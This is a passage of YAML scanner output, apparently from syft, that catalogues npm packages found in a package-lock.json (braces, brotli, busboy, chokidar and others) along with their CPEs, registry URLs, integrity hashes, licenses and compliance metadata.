- cpe: cpe:2.3:a:braces_project:braces:3.0.3:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
- cpe: cpe:2.3:a:jonschlinkert:braces:3.0.3:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/braces@3.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/braces/-/braces-3.0.3.tgz
integrity: sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==
dependencies:
fill-range: ^7.1.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4acea70fbe4d3073
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: brotli 1.3.3'
title: brotli 1.3.3
description: 'Package discovered: brotli 1.3.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6bc686959e36e164
name: brotli
version: 1.3.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:brotli:brotli:1.3.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/brotli@1.3.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/brotli/-/brotli-1.3.3.tgz
integrity: sha512-oTKjJdShmDuGW94SyyaoQvAjf30dZaHnjJ8uAF+u2/vGJkJbJPJAT1gDiOJP5v1Zb6f9KEyW/1HpuaWIXtGHPg==
dependencies:
base64-js: ^1.1.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 08e716a2d2fe7179
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: browserify-zlib 0.2.0'
title: browserify-zlib 0.2.0
description: 'Package discovered: browserify-zlib 0.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: adb6ab9adab6e7b8
name: browserify-zlib
version: 0.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:browserify-zlib:browserify-zlib:0.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:browserify-zlib:browserify_zlib:0.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:browserify_zlib:browserify-zlib:0.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:browserify_zlib:browserify_zlib:0.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:browserify:browserify-zlib:0.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:browserify:browserify_zlib:0.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/browserify-zlib@0.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/browserify-zlib/-/browserify-zlib-0.2.0.tgz
integrity: sha512-Z942RysHXmJrhqk88FmKBVq/v5tqmSkDz7p54G/MGyjMnCFFnC79XWNbg+Vta8W6Wb2qtSZTSxIGkJrRpCFEiA==
dependencies:
pako: ~1.0.5
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 27d8113ce8ad07e6
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: browserslist 4.28.2'
title: browserslist 4.28.2
description: 'Package discovered: browserslist 4.28.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 4688a05ee871df84
name: browserslist
version: 4.28.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:browserslist_project:browserslist:4.28.2:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/browserslist@4.28.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/browserslist/-/browserslist-4.28.2.tgz
integrity: sha512-48xSriZYYg+8qXna9kwqjIVzuQxi+KYWp2+5nCYnYKPTr0LvD89Jqk2Or5ogxz0NUMfIjhh2lIUX/LyX9B4oIg==
dependencies:
baseline-browser-mapping: ^2.10.12
caniuse-lite: ^1.0.30001782
electron-to-chromium: ^1.5.328
node-releases: ^2.0.36
update-browserslist-db: ^1.2.3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4b1e259ceb7e99ec
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: buffer-equal-constant-time 1.0.1'
title: buffer-equal-constant-time 1.0.1
description: 'Package discovered: buffer-equal-constant-time 1.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ea42e35a908d5ccd
name: buffer-equal-constant-time
version: 1.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:buffer-equal-constant-time:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer-equal-constant-time:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer_equal_constant_time:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer_equal_constant_time:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer-equal-constant:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer-equal-constant:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer_equal_constant:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer_equal_constant:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer-equal:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer-equal:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer_equal:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer_equal:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/buffer-equal-constant-time@1.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/buffer-equal-constant-time/-/buffer-equal-constant-time-1.0.1.tgz
integrity: sha512-zRpUiDwd/xk6ADqPMATG8vc9VPrkck7T07OIx0gnjmJAnHnTVXNQG3vfvWNuiZIkwu9KrKdA1iJKfsfTVxE6NA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 991f80bfd3038fd0
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: buffer-from 1.1.2'
title: buffer-from 1.1.2
description: 'Package discovered: buffer-from 1.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 98e22d90241a7628
name: buffer-from
version: 1.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:buffer-from:buffer-from:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer-from:buffer_from:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer_from:buffer-from:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer_from:buffer_from:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer:buffer-from:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:buffer:buffer_from:1.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/buffer-from@1.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz
integrity: sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e092abe833e5a95d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: busboy 1.6.0'
title: busboy 1.6.0
description: 'Package discovered: busboy 1.6.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3009b8237fb85cf0
name: busboy
version: 1.6.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:busboy:busboy:1.6.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/busboy@1.6.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/busboy/-/busboy-1.6.0.tgz
integrity: sha512-8SFQbg/0hQ9xy3UNTB0YEnsNBbWfhf7RtnzpL7TkBiTBRfrQ9Fxcnz7VJsleJpyp6rVLvXiuORqjlHi5q+PYuA==
dependencies:
streamsearch: ^1.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 81eb78c52edce0ec
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: bytes 3.1.2'
title: bytes 3.1.2
description: 'Package discovered: bytes 3.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f9a24c0655f5cc44
name: bytes
version: 3.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:bytes:bytes:3.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/bytes@3.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/bytes/-/bytes-3.1.2.tgz
integrity: sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a35927eb13a2081e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: call-bind-apply-helpers 1.0.2'
title: call-bind-apply-helpers 1.0.2
description: 'Package discovered: call-bind-apply-helpers 1.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2303cf02934afa6a
name: call-bind-apply-helpers
version: 1.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:call-bind-apply-helpers:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call-bind-apply-helpers:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call_bind_apply_helpers:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call_bind_apply_helpers:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call-bind-apply:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call-bind-apply:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call_bind_apply:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call_bind_apply:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call-bind:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call-bind:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call_bind:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call_bind:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/call-bind-apply-helpers@1.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz
integrity: sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==
dependencies:
es-errors: ^1.3.0
function-bind: ^1.1.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4e5277c95313e881
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: call-bound 1.0.4'
title: call-bound 1.0.4
description: 'Package discovered: call-bound 1.0.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 23c8e695a4ffce79
name: call-bound
version: 1.0.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:call-bound:call-bound:1.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call-bound:call_bound:1.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call_bound:call-bound:1.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call_bound:call_bound:1.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call:call-bound:1.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:call:call_bound:1.0.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/call-bound@1.0.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/call-bound/-/call-bound-1.0.4.tgz
integrity: sha512-+ys997U96po4Kx/ABpBCqhA9EuxJaQWDQg7295H4hBphv3IZg0boBKuwYpt4YXp6MZ5AmZQnU/tyMTlRpaSejg==
dependencies:
call-bind-apply-helpers: ^1.0.2
get-intrinsic: ^1.3.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a4cb8d0a4eb7503f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: camelcase 5.3.1'
title: camelcase 5.3.1
description: 'Package discovered: camelcase 5.3.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 98453e2c1718f20f
name: camelcase
version: 5.3.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:camelcase:camelcase:5.3.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/camelcase@5.3.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz
integrity: sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 3b9efee290bbc139
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: camelcase-css 2.0.1'
title: camelcase-css 2.0.1
description: 'Package discovered: camelcase-css 2.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b224930ed183bceb
name: camelcase-css
version: 2.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:camelcase-css:camelcase-css:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:camelcase-css:camelcase_css:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:camelcase_css:camelcase-css:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:camelcase_css:camelcase_css:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:camelcase:camelcase-css:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:camelcase:camelcase_css:2.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/camelcase-css@2.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/camelcase-css/-/camelcase-css-2.0.1.tgz
integrity: sha512-QOSvevhslijgYwRx6Rv7zKdMF8lbRmx+uQGx2+vDc+KI/eBnsy9kit5aj23AgGu3pa4t9AgwbnXWqS+iOY+2aA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 54ace4d8b29c3fad
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: caniuse-lite 1.0.30001791'
title: caniuse-lite 1.0.30001791
description: 'Package discovered: caniuse-lite 1.0.30001791'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 574728aff770dffd
name: caniuse-lite
version: 1.0.30001791
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: CC-BY-4.0
spdxExpression: CC-BY-4.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:caniuse-lite:caniuse-lite:1.0.30001791:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:caniuse-lite:caniuse_lite:1.0.30001791:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:caniuse_lite:caniuse-lite:1.0.30001791:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:caniuse_lite:caniuse_lite:1.0.30001791:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:caniuse:caniuse-lite:1.0.30001791:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:caniuse:caniuse_lite:1.0.30001791:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/caniuse-lite@1.0.30001791
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001791.tgz
integrity: sha512-yk0l/YSrOnFZk3UROpDLQD9+kC1l4meK/wed583AXrzoarMGJcbRi2Q4RaUYbKxYAsZ8sWmaSa/DsLmdBeI1vQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d2ccf1883f8178ec
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: chokidar 3.6.0'
title: chokidar 3.6.0
description: 'Package discovered: chokidar 3.6.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e6e064efe5c17d2c
name: chokidar
version: 3.6.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:chokidar:chokidar:3.6.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/chokidar@3.6.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/chokidar/-/chokidar-3.6.0.tgz
integrity: sha512-7VT13fmjotKpGipCW9JEQAusEPE+Ei8nl6/g4FBAmIm0GOOLMua9NDDo/DWp0ZAxCr3cPq5ZpBqmPAQgDda2Pw==
dependencies:
anymatch: ~3.1.2
braces: ~3.0.2
glob-parent: ~5.1.2
is-binary-path: ~2.1.0
is-glob: ~4.0.1
normalize-path: ~3.0.0
readdirp: ~3.6.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 265715c369a6ec46
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: client-only 0.0.1'
title: client-only 0.0.1
description: 'Package discovered: client-only 0.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e7be86c370ee2217
name: client-only
version: 0.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:client-only:client-only:0.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:client-only:client_only:0.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:client_only:client-only:0.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:client_only:client_only:0.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:client:client-only:0.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:client:client_only:0.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/client-only@0.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/client-only/-/client-only-0.0.1.tgz
integrity: sha512-IV3Ou0jSMzZrd3pZ48nLkT9DA7Ag1pnPzaiQhpW7c3RbcqqzvzzVu+L8gfqMp/8IM2MQtSiqaCxrrcfu8I8rMA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c077917c166ed35e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
